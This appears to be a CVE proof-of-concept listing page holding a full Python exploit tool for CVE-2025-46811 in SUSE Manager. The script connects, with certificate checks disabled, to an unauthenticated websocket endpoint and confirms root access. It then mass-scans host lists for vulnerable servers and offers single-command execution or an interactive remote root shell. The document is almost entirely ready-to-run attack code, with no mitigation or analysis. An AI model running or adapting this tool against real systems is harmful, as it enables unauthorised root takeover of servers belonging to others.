4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / CVE-2025-46811.py PY
#!/usr/bin/env python3
import asyncio
import websockets
import ssl
import argparse
from concurrent.futures import ThreadPoolExecutor
from typing import List, Tuple, Optional
import logging
from colorama import Fore, Style, init

# Initialize colorama
init(autoreset=True)

class SUSEManagerExploiter:
    """SUSE Manager CVE-2025-46811 Exploitation Tool"""
    
    def __init__(self, debug: bool = False):
        self.ssl_context = ssl.create_default_context()
        self.ssl_context.check_hostname = False
        self.ssl_context.verify_mode = ssl.CERT_NONE
        self.debug = debug
        self._setup_logging()

    def _setup_logging(self):
        """Configure debug logging"""
        logging.basicConfig(
            level=logging.DEBUG if self.debug else logging.INFO,
            format=f'{Fore.CYAN}%(asctime)s{Style.RESET_ALL} - %(levelname)s - %(message)s',
            handlers=[logging.StreamHandler()]
        )
        self.logger = logging.getLogger(__name__)

    def _debug_print(self, message: str, level: str = "info"):
        """Enhanced debug output with colors"""
        color = {
            "debug": Fore.BLUE,
            "info": Fore.GREEN,
            "warning": Fore.YELLOW,
            "error": Fore.RED,
            "critical": Fore.RED + Style.BRIGHT
        }.get(level.lower(), Fore.WHITE)

        if self.debug or level != "debug":
            print(f"{color}[{level.upper()}]{Style.RESET_ALL} {message}")

    async def check_vulnerability(self, host: str, timeout: int = 5) -> Tuple[str, bool, str]:
        """Check if target is vulnerable"""
        self._debug_print(f"Testing {host}", "debug")
        try:
            async with websockets.connect(
                f"wss://{host}/rhn/websocket/minion/remote-commands",
                ssl=self.ssl_context,
                timeout=timeout,
                extra_headers={"Origin": f"https://{host}"}
            ) as ws:
                self._debug_print(f"Connected to {host}", "info")
                await ws.send('id')
                response = await asyncio.wait_for(ws.recv(), timeout=2)
                self._debug_print(f"Received response: {response}", "debug")
                
                if 'uid=0(root)' in response:
                    self._debug_print(f"{host} is vulnerable!", "info")
                    return (host, True, "Vulnerable - root access confirmed")
                return (host, False, "Unexpected response format")
                
        except Exception as e:
            self._debug_print(f"Error checking {host}: {str(e)}", "error")
            return (host, False, f"Error: {str(e)}")

    async def execute_command(self, host: str, command: str, timeout: int = 10) -> str:
        """Execute commands on vulnerable hosts"""
        self._debug_print(f"Executing: {command} on {host}", "debug")
        try:
            async with websockets.connect(
                f"wss://{host}/rhn/websocket/minion/remote-commands",
                ssl=self.ssl_context,
                timeout=timeout,
                extra_headers={"Origin": f"https://{host}"}
            ) as ws:
                await ws.send(command)
                response = await asyncio.wait_for(ws.recv(), timeout=timeout)
                self._debug_print(f"Command output: {response}", "debug")
                return response
        except Exception as e:
            error_msg = f"Command execution failed: {str(e)}"
            self._debug_print(error_msg, "error")
            return error_msg

    async def batch_scan(self, hosts: List[str], max_workers: int = 10) -> List[Tuple[str, bool, str]]:
        """Concurrently scan multiple hosts"""
        self._debug_print(f"Starting batch scan of {len(hosts)} hosts", "info")
        tasks = [self.check_vulnerability(host) for host in hosts]
        return await asyncio.gather(*tasks)

    async def interactive_shell(self, host: str):
        """Start interactive RCE session"""
        self._debug_print(f"Starting interactive session with {host}", "info")
        print(f"{Fore.GREEN}[+] Connected to {host} (type 'exit' to quit){Style.RESET_ALL}")
        while True:
            try:
                cmd = input(f"{Fore.YELLOW}remote-shell> {Style.RESET_ALL}")
                if cmd.lower() in ('exit', 'quit'):
                    break
                result = await self.execute_command(host, cmd)
                print(f"{Fore.CYAN}{result}{Style.RESET_ALL}")
            except KeyboardInterrupt:
                self._debug_print("Session terminated by user", "warning")
                break
            except Exception as e:
                print(f"{Fore.RED}[!] Error: {e}{Style.RESET_ALL}")

def main():
    parser = argparse.ArgumentParser(description="SUSE Manager Vulnerability Scanner & Exploiter")
    subparsers = parser.add_subparsers(dest='mode', required=True)

    # Global arguments
    parser.add_argument('--debug', action='store_true', help='Enable debug output')

    # Scan mode
    scan_parser = subparsers.add_parser('scan', help='Scan for vulnerable hosts')
    scan_parser.add_argument('-i', '--input', required=True, help='Input file containing hosts (IP/Domain)')
    scan_parser.add_argument('-o', '--output', help='Output file for vulnerable hosts')
    scan_parser.add_argument('-t', '--threads', type=int, default=10, help='Concurrent threads')

    # Exploit mode
    exploit_parser = subparsers.add_parser('exploit', help='Execute commands on vulnerable host')
    exploit_parser.add_argument('host', help='Target host (IP/Domain)')
    exploit_parser.add_argument('-c', '--command', help='Single command to execute')

    args = parser.parse_args()
    exploiter = SUSEManagerExploiter(debug=args.debug)

    if args.mode == 'scan':
        with open(args.input) as f:
            targets = [line.strip() for line in f if line.strip()]
        
        exploiter._debug_print(f"Scanning {len(targets)} hosts...", "info")
        results = asyncio.run(exploiter.batch_scan(targets, args.threads))
        
        vulnerable = [host for host, is_vuln, _ in results if is_vuln]
        for host, _, msg in results:
            status = f"{Fore.GREEN}VULNERABLE{Style.RESET_ALL}" if host in vulnerable else f"{Fore.RED}SAFE{Style.RESET_ALL}"
            print(f"{host}: {status} - {msg}")
        
        if args.output and vulnerable:
            with open(args.output, 'w') as f:
                f.write("\n".join(vulnerable))
            exploiter._debug_print(f"Vulnerable hosts saved to {args.output}", "info")

    elif args.mode == 'exploit':
        if args.command:
            print(asyncio.run(exploiter.execute_command(args.host, args.command)))
        else:
            asyncio.run(exploiter.interactive_shell(args.host))

if __name__ == "__main__":
    main()